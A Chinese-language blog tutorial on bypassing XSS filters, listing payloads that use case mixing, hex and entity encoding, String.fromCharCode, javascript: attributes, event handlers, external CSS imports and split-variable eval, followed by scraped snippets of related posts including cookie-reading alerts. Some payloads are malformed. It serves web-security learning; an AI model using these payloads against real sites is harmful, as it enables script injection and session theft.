XSS篇——XSS过滤绕过技巧

最新推荐文章于 2025-03-14 19:50:17 发布
最新推荐文章于 2025-03-14 19:50:17 发布
阅读量3.3w 收藏 43
点赞数 10
分类专栏: web安全

改变大小写

在测试过程中,我们可以改变测试语句的大小写来绕过XSS规则:

比如:<script>alert(“xss”);</script>可以转换为:
<ScRipt>ALeRt(“XSS”);</sCRipT>

关闭标签

有时候我们需要关闭标签来使我们的XSS生效。

比如:“><script>alert(“Hi”);</script>

使用hex编码绕过

我们可以对我们的语句进行hex编码来绕过XSS规则

比如:<script>alert(“xss”);</script>可以转换为:
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%78%73%73%22%29%3b%3c%2f%73%63%72%69%70%74%3e

绕过magic_quotes_gpc

magic_quotes_gpc=ON是php中的安全设置,开启后会把一些特殊字符进行轮换,比如’(单引号)转换为\’,”(双引号)转换为\”,\转换为\\

比如:<script>alert(“xss”);</script>会转换为<script>alert(\”xss\”);</script>,这样我们的xss就不生效了。

针对开启了magic_quotes_gpc的网站,我们可以通过javascript中的String.fromCharCode方法来绕过,我们可以把alert(“XSS”);转换为

String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 88, 83, 83, 34,41)那么我们的XSS语句就变成了

<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 88,83, 83, 34, 41, 59)</script>

String.fromCharCode()是javascript中的字符串方法,用来把ASCII转换为字符串。

最后使用<script>转换后的放到这里</script>包含即可。

利用<>标记注射Html/Javascript

如果用户能随心所欲引入<>标记,那他就能操作HTML标记,然后就能通过<script>标签插入JS恶意脚本了,例如:

<script>alert(‘XSS‘);</script>

当然如果对"<>"和script等进行了过滤,上面这个就无法执行了

利用HTML标签属性值执行XSS

很多HTML标记中的属性都支持javascript:[code]伪协议的形式,这就给了注入XSS可乘之机,例如:

<img src = "javascript:alert(‘xss‘);">

这里即便对传入的参数过滤了<>,XSS还是能发生(前提是该标签属性需要引用文件)

空格/回车/Tab

假设过滤函数进一步又过滤了javascript等敏感字符串,只需对javascript进行小小的操作即可绕过,例如:

 <img src= "java  script:alert(‘xss‘);" width=100>

这里之所以能成功绕过,其实还得益于JS自身的性质:Javascript通常以分号结尾,如果解析引擎能确定一个语句时完整的,且行尾有换行符,则分号可省略

而如果不是完整的语句,javascript则会继续处理,直到语句完整结束或分号。

像<img src= "javascript: alert(/xss/); width=100> 同样能绕过

对标签属性值进行转码

过滤严谨的函数很可能对标签也进行了严格的控制,但是如果用其他形式表示标签,脚本仍能解析却可以绕过过滤

常见的编码方式有:HTML实体编码(&#ASCII),十进制、十六进制、八进制编码,unicode编码及escape编码及使用String.fromCharCode(...)绕过

因此<img src= "javascript&#116&#alert(/xss/);">可以实现绕过

另外还可以把&#01、&#02、&#09等字符插入代码的头部或任意地方

产生自己的事件

如果不能依靠属性进行跨站,那么还可以利用事件处理函数

<input type = "button"  value = "clickme" οnclick="alert(‘click me‘)" />

事件既能让JS脚本运行,自然也可以执行跨站,另外像onerror、onMouseover等都可利用的是事件处理函数

利用CSS跨站剖析

之所以说CSS样式表是个很不错的载体,是因为CSS不需要嵌入到HTML代码中,可以直接从文件或其他地方进行引用. 另外CSS同样隐蔽、灵活,不过不同

浏览器之间不能通用,如:

<div style = "list-style-image:url(javascript:alert(‘xSS‘))">

<link rel = "stylesheet" href ="http://www.xxx.com/atack.css">

<style type=‘text/css‘>@import url(http://www.xxx.com/xss.css);</style>

<style>@import ‘javascript:alert(‘xss‘);‘</style>

绕过过滤规则

大小写混用:<iMgSRC = "JavaScript:alert(0);">

不使用引号或者构造全角字符也能扰乱过滤规则

还有像CSS中/**/会被浏览器忽略,\和\0同样或被浏览器忽略,同样可以用来绕过:

<img src ="java/*javascript:alert(‘xss‘)*/script:alert(1);">

充分利用字符编码

上面说到过编码,这里加以补充,除了像&#ASCII,其实也可以采用&#0、&#00、&#000等形式,同样&#x6a的形式也是可以的

<script>eval("\61\6c\65......");<script>

如果使用eval执行10进制形式的脚本则需要配合string.fromcharcode()使用

拆分跨站法

拆分跨站就是像shellcode一样,遇到长度限制不能按正常方式跨站时,通过引入变量多次提交将之连接起来实现跨站,例如:

<script>z=‘document.‘</script>

<script>z=+‘write‘("‘</script>

<script>z=z+‘<script‘</script>

......

<script>eval(z)</script>

另外除了像上面多次提交,也可以引用其他变量如:eval(qUserInfo.spaceName)形式,由于qUserInfo.spaceName是可控变量,因此改变其值就可以绕过长度限制了

XSS攻击的简单过滤绕过
caoxinjian423的博客
09-02 3497
一、常见的XSS攻击脚本 弹窗警告 <script>alert('XSS')</script> <script>alert(document.cookie)</script> 页面嵌套 <iframe> src=http://www.baidu.comwidth=10 height=10 border=10 </iframe> 重定向 <script>window.location="http://www.b.
第十五天DOM型xss和编码绕过问题
代码审计
03-21 2028
DOM型xss 对象模型(Document Object Model),即大名鼎鼎的DOM。 DOM可以被认为是一种通过将页面元素以对象的树形方式表现,以便由Javascript组织处理的实现方法。 特点2 无需服务器参与 为什么右键查看源代码 无法找到插入的payload 源代码 来源于服务器的返回 而dom型xss无需服务器的参与 所以此时无法修改右键查看的源代码 DOM XSS与反射型XSS和存储型XSS的差别是在于DOM XSS的代码不需要服务器解析响应的直接参与,触发XSS漏洞靠
9.XSS过滤
愿听风成曲
06-25 535
如下图所示,大小写混合被弹窗,被执行了。查看页面元素代码,被后台代码过滤了。如下图依然可以弹窗为“xss”通过输入代码发现被过滤掉了。
XSS漏洞总结之小试牛刀
qq_53058639的博客
03-14 561
1>:简介XSS是跨站脚本攻击,属于被动式的攻击。XSS指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意的特殊目的。2>: 分类及危害XSS分类:反射型: 非持久性XSS攻击,当用户访问已被插入攻击代码的链接时,攻击代码执行,完成该次攻击。存储型:持久型XSS攻击,攻击者把攻击代码永久存储在目标服务器上中,例如数据库,消息论坛,留言板,访问者日志等。当用户进入页面,代码就会被执行。
45. XSS——XSS过滤绕过技巧
热门推荐
Fly_鹏程万里
03-20 2万+
无意中发现了一个巨牛巨牛的人工智能教程,忍不住分享一下给大家。教程不仅是零基础,通俗易懂,小白也能学,而且非常风趣幽默,还时不时有内涵段子,像看小说一样,哈哈~我正在学习中,觉得太牛了,所以分享给大家。点这里可以跳转到教程! 改变大小写 在测试过程中,我们可以改变测试语句的大小写来绕过XSS规则: 比如:<script>alert(“xss”);</script>可以...
xss过滤总结
weixin_42109829的博客
12-04 3499
一。简述 一。简述 XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序. 例如: 1.盗用cookie,获取敏感信息。 2.利用植入Flash,通过crossdomain权限设置进一步获取更高权限;或者利用Java等得到类似的操作。 3.利用iframe、frame、XMLHttpRequest或上述Flash等方式,以...
xss过滤技巧
Richard_qi的博客
04-11 3768
xss过滤技巧(个人记录) 改变大小写 在测试过程中,我们可以改变测试语句的大小写来绕过XSS规则: 比如:<script>alert(“xss”);</script>可以转换为: <ScRipt>ALeRt(“XSS”);</sCRipT> 关闭标签 有时候我们需要关闭标签来使我们的XSS生效。 比如:“><script>alert(“Hi”);</script> 使用hex编码绕过 我们可以对我们的语句进行hex编码来绕过X
xss过滤
weixin_30535167的博客
07-09 360
content="""<p class='c1' id='i1'> asdfaa<span class='c2' style="font-family:NSimSun;">sdf<a>a</a>sdf</span>sdf</p><p> <strong class='c2' id='i2'&g...
防止xss和sql注入:JS特殊字符过滤正则
12-01
有些攻击者可能会使用编码或转义技术绕过这种简单的过滤。为了更全面地防止XSS,应当结合其他防御措施,如使用Content Security Policy (CSP)、输入验证、HTML编码、输出编码等。 对于SQL注入,预防的最佳做法是...
WEB漏洞——跨站脚本攻击(XSS
m0_56634355的博客
06-05 4903
目录一、XSS简述1.1 什么是XSS1.2 XSS分类1.3 DOM XSS漏洞演示二、XSS攻击进阶2.1 初探XSS Payload2.2 强大的XSS Payload2.3 XSS攻击平台2.4 XSS Worm2.5 XSS构造技巧2.6 反射型XSS利用技巧-回旋镖2.7 Flash XSS2.8 JavaScript开放框架三、XSS防御3.1 HttpOnly3.2 输入检查3.3 输出检查3.4 正确地防御XSS3.5 处理富文本3.6 防御DOM Based XSS四、总结XSS攻击是指
XSS 漏洞绕过
白菜执笔人的博客
03-04 3070
Web安全攻防 学习笔记 一、XSS 漏洞 1.1、跳过 Stage #9 在 span 标签中添加 onclick= "alert(document.domain)" (其他关卡也可以这样跳过) 1.2、domain 过滤绕过 首先还是构造特殊无害字符串,响应中寻找字符串观察闭合格式。 双写绕过 "><script>alert(document.dodomain...
DVWA——XSS注入复现
qq_62056583的博客
07-13 2022
在对DVWA靶场漏洞复现前,先了解一下XSS漏洞的相关知识攻击者利用它向网页中注入恶意的客户端脚本,使得用户在访问页面时执行这些恶意脚本,从而达到攻击的目的。这种攻击通常利用了网站未对用户输入进行充分过滤或转义的情况。XSS的攻击方式分为三种,分别是:分别为反射型(Reflected),存储型(Stored)和DOM型。:只是简单地把用户输入的数据反射给浏览器,简单来说,黑客往往需要用户诱使用户点击一个恶意链接,才能攻击成功。(经后端,不经数据库):将用户输入的数据存储在服务器端。
xss绕过方法有哪些?XSS攻击绕过过滤方法技巧分享(xss绕过宝塔)
白帽子佳奇的博客
12-12 6848
XSS(跨站脚本攻击)绕过方法是一系列技巧,用来绕过目标网站的安全措施和过滤器,执行恶意的脚本。
xss过滤绕过(2)
2402_87039650的博客
11-09 2585
常见的过滤方式是用户输入的标签进行限制,如果采用黑名单的方式,我们可以寻找黑名单中遗漏的标签,在https://portswigger.net/web-security/cross-site-scripting/cheat-sheet这个表中列举了大量的可以用于执行JavaScript的标签和属性,并给出了适用于哪些浏览器。如果没有过滤"<"和">",可以直接引入新的标签,如果尖括号被过滤,可以插入新的事件属性,比如onload,onmousemove等。CSP被设计成完全向后兼容。
xss绕过字符过滤_【渗透实例】记录一次XSS渗透过程
weixin_32493541的博客
01-04 960
0x01 找到存在XSS的位置没什么技巧,见到框就X,功夫不负有心人,在目标网站编辑收货地址处发现了存在XSS的地方,没想到这种大公司还会存在XSS。使用的XSS代码:<img src=1 onerror=alert(1)>0x02 构造XSS代码连接到XSS平台XSS平台给我们的XSS代码是这样的:</tExtArEa>'"><sCRiPt sRC=https...
xss绕过
weixin_43271438的博客
09-29 1717
1. 利用html标签的属性值 利用场景:标签支持JavaScript:code伪协议 对应防御:过滤JavaScript关键字 &lt;iframe src=javascript:alert(1)&gt; &lt;a href=javascript:alert(1)&gt; 文本&lt;/a&gt; " &gt;&lt;svg x="" Onclick=alert(1)&gt; 注释: # ...
javascript createelement_看我如何利用JavaScript全局变量绕过XSS过滤
weixin_39731107的博客
11-29 155
译文声明:本文是翻译文章,文章原作者secjuice,文章来源:secjuice.com原文地址:https://www.secjuice.com/bypass-xss-filters-using-javascript-global-variables/译文仅供参考,具体内容表达以及含义原文为准◆◆◆ ◆◆写在前面的话如果你发现你的攻击目标存在XSS漏洞,但是你所有的漏洞利用尝...
XSS绕过语句
qq_37613524的博客
11-25 751
利用js &amp;amp;lt;script&amp;amp;gt;alert(1)&amp;amp;lt;/script&amp;amp;gt; &amp;amp;lt;SCRIPT&amp;amp;gt;alert(1)&amp;amp;lt;/SCRIPT&amp;amp;gt; &amp;amp;lt;scscriptript&amp;amp;gt;alert(1)&amp;amp;lt;/scrscri
xss绕过方法(前端绕过,拼凑绕过,注释干扰绕过,编码绕过
qq_43814486的博客
05-05 9195
绕过思路 前端绕过:前端有很多种方法绕过,比如抓包重放或者修改前端代码。 大小写绕过:一般后台对输入写进行过滤使用两种方法:1,使用正则匹配,2,用查找的函数查找。这两种方法可以用大小写混合的方式进行绕过,而后端是不管大小写的,可以正常执行我们的语句。 拼凑:后端会对我们输入的标签进行替换,但只替换一次,所以可以这样: <scri<script>pt>alert("hell...
xss闭合绕过
最新发布
03-24
### 关于XSS攻击中闭合标签的绕过技术 跨站脚本攻击(XSS)是一种常见的安全漏洞,允许攻击者注入恶意代码到网页上。为了防止这种攻击,许多现代浏览器和服务器端防护机制会尝试过滤掉潜在危险的内容。然而,一些特定的技术可以用来绕过这些防御措施。 #### 使用HTML实体编码绕过 一种常见的方式是利用HTML实体编码来混淆输入内容。例如,在某些情况下可以通过嵌入转义字符或者特殊编码形式来规避检测器对闭合标签的识别。下面是一个例子: ```html <IMG SRC="jav ascript:alert('XSS');"> ``` 这里通过插入十六进制表示的新行符` `打断了JavaScript关键字,从而可能避开简单的正则表达式匹配[^1]。 #### 利用不完整的标签结构 有时不需要完全关闭标签也可以触发事件处理程序。比如只写开标签而省略结束部分可能会让解析引擎仍然执行其中定义的动作: ```html <img src=x onerror=alert(1)> ``` 此片段故意制造了一个错误路径作为图像源地址(`src`),当加载失败时就会调用`onerror`属性指定的行为——即弹窗显示消息框[^3]。 #### 借助Unicode或URL编码隐藏意图 对于那些基于字符串模式匹配的安全规则来说,采用不同的编码方式能够有效掩盖真实的payload含义。像这样把尖括号替换为其对应的数值引用也可能奏效: ```html <script>document.write("Hello World!");</script> ``` 上述代码中的实际意义被转换成了不可见的形式呈现给审查工具,但最终会被渲染成可运行状态下的JS指令集。 另外值得注意的是,针对具体环境定制化的测试非常重要,因为不同框架和技术栈所采取的防范策略各有差异。因此了解目标平台如何实现其保护层将是成功实施此类操作的关键前提条件之一[^2]。 ### 结论 综上所述,尽管存在多种手段可以帮助突破现有的防XSS屏障,但是每种方法都有局限性和适用范围。开发人员应当始终遵循最佳实践原则构建应用程序,并定期更新依赖库版本以减少遭受此类威胁的风险。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值